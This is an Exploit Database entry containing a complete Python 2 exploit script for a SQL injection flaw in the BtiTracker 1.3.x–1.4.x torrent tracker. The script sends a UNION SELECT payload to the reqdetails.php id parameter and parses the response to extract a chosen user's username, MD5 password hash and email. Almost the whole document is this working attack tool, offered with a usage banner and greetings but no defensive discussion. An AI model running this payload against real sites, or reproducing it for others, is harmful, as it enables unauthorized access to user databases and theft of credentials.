BtiTracker 1.3.x < 1.4.x - SQL Injection

• Exploit Database
• 16 阅读

• 作者： TinKode
  日期： 2010-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13807/

• #!/usr/bin/env python
  # 
  ################################################################################
  # ____________[ xpl0it ] #
  #/\___\/\_`\ __/\ \__#
  #\/_/\ \/ ___\ \,\L\_\ _____ _____ __ /\_\ \ ,_\____ #
  # \ \ \ /' _ `\/_\__ \ /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \#
  #\_\ \__/\ \/\ \/\ \L\ \/\__//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \ #
  #/\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\\ \_\ \__\\/`____ \#
  #\/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/\/_/ \/_/\/__/ `/___/> \ #
  # _________________ /\___/ #
  # www.insecurity.ro \/__/#
  ## 
  ################################################################################ 
  #[ BtiTracker 1.3.X - 1.4.X Exploit ]# 
  #Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches #
  #Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff# 
  ################################################################################ 
  # Because we care, we're security aware# 
  ################################################################################ 
  
  import sys, urllib2, re
   
  if len(sys.argv) < 2:
  print "==============================================================="
  print "============== BtiTracker 1.3.X - 1.4.X Exploit ==============="
  print "==============================================================="
  print "= Discovered and coded by TinKode ="
  print "= www.InSecurity.ro ="
  print "= ="
  print "= Local Command:="
  print "= ./isr.py [http://webshit] [ID]="
  print "= ="
  print "==============================================================="
  exit()
   
  if len(sys.argv) < 3:
  id = 1
  else:
  id = sys.argv[2]
   
  shit = sys.argv[1]
  if shit[-1:] != "/":
  shit += "/"
   
  url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
  concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
  ,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"
  print "\n"
  print "============================================="
  print "================= InSecurity ================"
  print "============================================="
   
  html = urllib2.urlopen(url).read()
  slobod = re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html)
  if len(slobod) > 0:
  print "ID : " + str(id)
  print "Username : " + slobod[0][0]
  print "Password : " + slobod[0][1]
  print "EMail: " + slobod[0][2] 
  print "============================================="
  print "================= InSecurity ================"
  print "============================================="
  else:
  print "Ai luat-o la gaoaza..."
  
  #InSecurity.ro - Romania